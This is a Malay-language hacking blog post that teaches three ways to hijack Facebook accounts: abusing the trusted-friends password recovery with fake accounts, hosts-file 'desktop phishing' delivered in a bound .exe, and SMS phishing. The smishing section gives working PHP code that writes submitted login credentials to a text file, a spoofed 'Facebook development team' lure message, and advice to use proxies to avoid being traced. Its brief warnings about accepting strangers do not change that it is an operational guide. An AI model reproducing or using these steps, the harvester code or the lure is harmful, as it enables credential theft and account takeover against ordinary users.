Salam semua..akhirnya tibalah masanya untuk Mr.Hac keluarkan artikel ini kerana sudah beberapa artikel sebelum ini banyak yang Hac ‘tahankan’ atas permintaan rakan..

Artikel ini kalau nak diikutkan sudah berada dalam draft dari minggu lepas..namun atas permintaan kawan baik Hac iaitu Azrael, Hac tahankan artikel ini terlebih dahulu kerana katanya ia boleh membawa musibah apabila dengan MUDAH dibuat dan disalahgunakan..ini kerana buat masa ini, kaedah yang bakal Hac tuliskan ini adalah kaedah hack Facebook yang paling berkesan dan paling mudah untuk dilakukan!

Namun apabila Hac telah melihat artikel ini terlebih dahulu dipost oleh seorang lagi rakan di Forum Silent Hackers, Hac rasakan ia perlu juga dipostkan di blog ini supaya lebih ramai dari kalangan anda yang MENGAMBIL PERHATIAN bahawa terdapat satu critical vulnerability dalam Facebook yang boleh menyebabkan banyak akaun digodam biarpun oleh orang kebiasaan..satu pesanan dari Hac, JANGAN DEDAHKAN DIRI ANDA KEPADA ORANG YANG TIDAK DIKENALI..

Adalah tidak menghairankan lagi apabila seseorang itu menerima pelawaan untuk menjadi rakan oleh orang yang tidak dikenalinya di Facebook (macam zaman Myspace dulu la..)..kerapkali kesemua permintaan untuk menjadi rakan di Facebook itu diterima untuk mengembangkan persahabatan dan tak kurang juga ada yang hendak menambahkan bilangan rakan..kelihatannya pada kebiasaan, Facebook selebriti dan mereka yang melakukan urusniaga kerap menerima 100% permintaan untuk menjadi rakan itu berbanding orang kebiasaan (biasa la..selebriti kena jaga hati peminat kan)..

Akaun dari jenis ini adalah yang PALING SENANG TERDEDAH KEPADA PENGGODAM..anda tidak perlukan sebarang kebijaksanaan ataupun ilmu hacking yang tinggi untuk melakukannya kerana anda hanya perlu melalui proses password recovery Facebook bersama 2 lagi rakan Facebook oleh akaun sasaran.

Anda dengan mudah boleh mendapatkan akses ke akaun tersebut dengan pendekatan yang sederhana..anda cuma perlu menggunakan ciri-ciri Facebook Password Recovery yang boleh dicapai melalui pautan “Forgot your password?” pada laman log masuk ke Facebook..

Setelah anda dapat mengenalpasti rakan-rakan, Facebook akan mencadangkan untuk mendapatkan semula kata laluan melalui alamat e-mel yang sedia ada..bagaimanapun ciri ini boleh dilepasi melalui pautan “No longer have access to these?”..dalam kes ini, Facebook akan meminta alamat e-mel yang baru..langkah seterusnya Facebook akan menanyakan soalan yang berkaitan dengan akaun tersebut..ciri ini juga boleh dilepasi dengan cara menaip jawapan yang salah sebanyak 3 kali..selepas itu, Facebook akan memberikan anda cara yang lebih memeranjatkan untuk mendapatkan semula kata laluan, iaitu dengan sokongan 3 orang rakan..

Hack Facebook Dengan Kaedah Recovery:

1. Pertama sekali, anda perlu memilih 3 orang rakan ‘yang dipercayai’..3 orang rakan ini akan menerima 3 code yang diperlukan untuk mengubah kata laluan akaun tersebut.

2. Pilih diri anda sendiri dan kemudian anda akan menerima code dari Facebook. dengan 3 code itu, anda dengan mudah akan dapat mengubah kata laluan akaun mangsa.

3. Masalah utamanya ialah 2 orang rakan lagi yang anda tidak begitu kenal dan tidak dapat dipercayai sepenuhnya boleh mendapatkan akses ke akaun itu melalui kaedah password recovery itu tadi..jadi?

4. Masalah ini juga boleh dilepasi melalui Teknik Social Engineering..buat lagi 2 akaun Facebook yang palsu dan tambahkan akaun mangsa ke dalam senarai rakan..sekarang, dapatkan ketiga-tiga code dari Facebook dan kesemuanya sudah selesai!!

Sedikit Pesanan: Akaun sasaran anda akan dikunci selama 24 jam selepas kata laluan diubah dan e-mel pengguna yang asal akan menerima pemberitahuan akan penukaran kata laluan bersama dengan senarai 3 orang rakan yang menerima code dari Facebook. bagaimanapun sekiranya 3 rakan ini adalah palsu, adalah tidak penting lagi sekiranya anda mengetahui nama mereka..

Salam..tutorial ini Mr.Hac dedikasikan kepada mereka yang sudah mencuba SMS Phishing..pening kepala?
Ok..tak mengapa sebab dalam tutorial Desktop phishing ini Hac akan beritahu serba sedikit beberapa benda yang ada kena mengena dengan SMS Phishing..ok?

Seni Phishing ini adalah jauh lebih advance berbanding sebelumnya..jadi Hac mengesyorkan anda baca dahulu siri seni phishing dalam blog ini supaya anda tidak ketinggalan point-point yang penting dalam usaha memahami kaedah phishing..

Dalam kaedah Desktop Phishing, seorang penggodam mengubah fail host anda (Windows/System32/drivers/etc/hosts) yang mana fail ini mengawal sesi pelayaran internet anda..

Perbezaan Antara Phishing dan Desktop Phishing:

Phishing:

1. Seseorang penggodam meyakinkan mangsanya untuk mengklik pada pautan yang membawa kepada halaman log masuk palsu (fake login page) yang menyerupai halaman log masuk yang sebenar.

2. Mangsa memasukkan maklumat akaunnya kepada halaman itu dan kesemua maklumat ‘diberikan’ terus kepada penggodam.

3. Mangsa kemudiannya akan dihalakan kepada halaman lain atau halaman log masuk yang asal bergantung kepada skrip yang telah dibuat oleh si penggodam.

Cuma masalah utama dalam seni phishing ini ialah mangsa dengan mudah dapat membezakan pautan halaman palsu dan halaman log masuk yang asli dengan melihat kepada pautan tersebut..

Desktop Phishing:

1. Penggodam menghantar satu fail (.exe) untuk diklik oleh mangsa. Apabila mangsa klik sahaja pada fail tersebut, semuanya selesai!

2. Mangsa menaip pautan kepada halaman log masuk yang asal tetapi dihalakan kepada halaman log masuk palsu tanpa pengetahuannya kerana nama domain pautan tersebut kekal seperti yang asal.

3. Langkah seterusnya sama sahaja seperti seni phishing yang biasa.

Apa Itu Host File?

Host file ialah satu fail teks yang mengandungi nama domain dan alamat IP yang berhubungkait dengannya..Lokasi fail ini terletak di:

notepad %windir%system32driversetchosts (taipkan di Run… dan tekan Enter)

atau anda boleh melihatnya secara normal di windows: C:WindowsSystem32driversetc

Apabila anda menaip sebagai contoh www.anywebsite.com, satu ‘pertanyaan’ akan dihantar kepada Domain Name Server (DNS) untuk mencari alamat IP yang berhubung dengan nama domain atau laman web itu. tetapi sebelum ini dilakukan, fail host yang berada dalam komputer kita akan ‘diperiksa’ untuk mendapatkan alamat IP kepada domain tersebut.

Katakan anda sudah membuat satu entry dalam fail host..contohnya apabila anda menaip www.anywebsite.com, anda akan dibawa kepada alamat IP 115.125.124.50. tiada ‘permintaan’ untuk mendapatkan lagi IP yang berhubung dengan www.anywebsite.com yang akan dihantar kepada DNS..lihat contoh pada gambar dibawah.

Bagaimana Kaedah Penyerangannya?

Sudah jelas rasanya bagaimana keadaan pelayaran internet anda sekiranya fail host ini diubahsuai oleh penggodam..

Apa yang perlu kita lakukan ialah mengubahsuai fail host dengan menambahkan nama domain yang asli/asal serta menghubungkannya kepada alamat IP halaman log masuk palsu yang telah kita buat..apabila mangsa menaip alamat domain yang asli, dia akan dihalakan kepada halaman log masuk yang palsu..sila lihat gambar dibawah.

Kaedah Hacking Melalui Desktop Phishing:

Kini sampailah masa kepada tutorial Desktop Phishing. Ikuti langkah demi langkah yang akan diberikan kepada anda kerana ia ada kaitan dengan SMS Phishing yang Hac telah ajarkan sebelum ini.

1. Host/Kendalikan Laman Phishing Dalam Komputer Anda
Disebabkan laman webhosting yang kerap digunakan oleh penggodam seperti 110mb.com, ripway.com, dan lain-lain lagi tidak menyokong ciri-ciri seperti menghalakan alamat IP kepada laman web anda seperti www.akunakhackkau.110mb.com (alamat IP dihalakan kepada webserver dan bukannya laman web), jadi kita perlu mengendalikan laman phishing yang telah dibuat dalam komputer sendiri dengan menggunakan perisian web server seperti wamp atau xampp..(ada kaitan kan dengan SMS Phishing?)

Seterusnya muat turun salah satu daripada perisian tersebut. katakan anda memilih wamp:

—> Salin fail phishing anda dan letakkannya dalam direktori WWW pada wamp, kedudukannya ialah di “C:WampWWW“

—> Jalankan Server Wamp pada PC anda.

—> Klik kanan di ikon wamp pada system tray dan pilih Start all services, pergi kepada public IP address anda dan anda akan dapat lihat laman phishing anda. (lawati cmyip.com untuk melihat alamat IP anda, dan salin IP itu..paste pada bar carian pelayar anda dan anda akan dapat lihat laman phishing anda itu..ok?)

2. Ubahsuai Fail Host
Sekiranya anda tidak mempunya sebarang akses kepada komputer mangsa, jadi salin fail host anda sendiri dan letakkannya pada desktop (senang nak tengok)
buka ia dengan notepad dan letakkan alamat IP anda dihubungkan bersama dengan nama domain yang anda ingini..

Sebagai contoh, apabila mangsa melawati www.gmail.com, dia akan dibawa kepada laman web yang dihoskan pada alamat IP ‘xxx.xxx.xxx.xxx’.

Gantikannya dengan alamat IP anda (Public IP Address)

3. Compress fail host anda itu tadi dan apabila mangsa membukanya, ia secara automatik akan disalinkan kepada C:Windowssystem32driversetc
—> fail host mangsa akan digantikan dengan fail host yang telah diubahsuai tadi.
Sila ikuti kaedahnya melalui gambar-gambar berikut:

Klik OK..Sekarang anda sudah boleh bind fail ini dengan mana-mana fail exe (.exe) dengan menggunakan binder atau hantarkannya secara terus kepada mangsa. apabila mangsa klik pada fail ini, kerja anda sudah ditanggung beres!

Limitasi Kaedah Phishing Ini:

1. Apabila anda menggunakan public IP, maka ia akan cepat berubah setiap kali anda connect dan disconnect..jadi anda perlu mendapatkan static IP sama ada dengan membelinya atau mendapatkannya di mana-mana sumber..satu perkataan yang sesuai untuk anda —> GOOGLE

2. Pelayar yang digunakan oleh mangsa mungkin akan memberikan amaran bahawa Digital Certificate laman web yang sedang dilawatinya adalah tidak asli.

Seni phishing nampaknya telah banyak berevolusi..dalam blog ini pun Hac telah menulis beberapa kaedah untuk melakukannya dan kebanyakan kaedah menjurus kepada cara untuk menggodam Facebook..

Dalam tutorial kali ini Hac akan memberikan satu cara untuk membuat SMS PHISHING atau Smishing..kaedah ini adalah kombinasi antara SMS dan phishing..
ia bukanlah benda baru tetapi kaedah ini boleh dikatakan masih relevan untuk digunakan kepada mereka yang kurang pengetahuan dalam ilmu IT..jadi mari sama-sama kita terjah tutorial ini!
(Entry ini seperti biasa akan membincangkan kaedah untuk hack Facebook)

p/s: kalau ada kesilapan dalam tutorial ini harap maaf lah yaaa…

‘Perjalanan’ Gerak Kerja Teknik Hacking Ini:

Seperti biasa, phishing jenis ini masih menggunakan ‘fake login page’ atau halaman log masuk palsu..cuma versi ini menggunakan telefon bimbit sebagai medium penyampaian maklumat..si mangsa akan menerima satu sms mengatakan ada versi baru dalam Facebook Mobile dan harus dicuba supaya tidak ketinggalan..

Apa yang diperlukan ialah web server yang dijalankan pada komputer anda dan disambungkan ke internet, serta nombor telefon bimbit sasaran..jangan tanya Mr.Hac bagaimana nak dapatkan web server ataupun perisiannya..
sila —–> GOOGLE..

Kaedah Membuat SMS Phishing a.k.a Smishing:

Pergi ke pautan Facebook Mobile dan salin serta simpan source codenya (klik kanan+View Page Source) pada komputer anda..buka fail tersebut dengan menggunakan notepad dan ubah code ‘form method’ daripada ‘post’ kepada ‘get’..ubah nilai ‘action’ kepada write.php (nak letak nama lain pun boleh!)..namakan fail itu sebagai ‘index.htm’..buat satu lagi fail dengan membuka notepad, salin code berikut dan simpankan ia, namakan sebagai ‘write.php’..

<?php
header(“Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6”);
$handle = fopen(“pswd.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

atau boleh juga gunakan code ini:

header(“Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6”);$handle = fopen(“pswd.txt”, “a”);
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);
}fwrite($handle, “rn”);fclose($handle);
exit;?>

Buat juga satu lagi fail dari notepad dan namakannya sebagai pswd.txt..terus simpan tanpa mengubah apa-apa..

Penghantaran SMS:

Sila gunakan laman web penghantaran SMS percuma yang menghantar dengan menggunakan nombor mereka sendiri dan tidak perlukan pendaftaran (ni panduan supaya senang kerja!)..terdapat banyak laman seperti itu..seperti biasa, jangan tanya..sila GOOGLE..berikut adalah sedikit pratonton SMS yang akan dihantar:

Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://alamat-IP-anda/direktori-anda/
-Facebook development team.

Disarankan supaya anda gunakan proxy sebelum menghantar SMS tersebut..
Sedikit pesanan: berhati-hati apabila menjalankan server..

Ya..tutorial ini memang tidak lengkap..Mr.Hac ada tinggalkan satu lagi gerak kerja yang perlu anda cari sendiri iaitu cara untuk memuat naik fail-fail diatas ke dalam web server..sengaja Hac buat begitu supaya anda tahu nilai ilmu yang Hac sampaikan di sini..sekiranya ada kekeliruan, ada permasalahan (troubleshooting), atau ada kepala-kepala yang sakit akibat memikirkan caranya, maka carilah perlahan-lahan dan anda pasti akan jumpa jawapannya!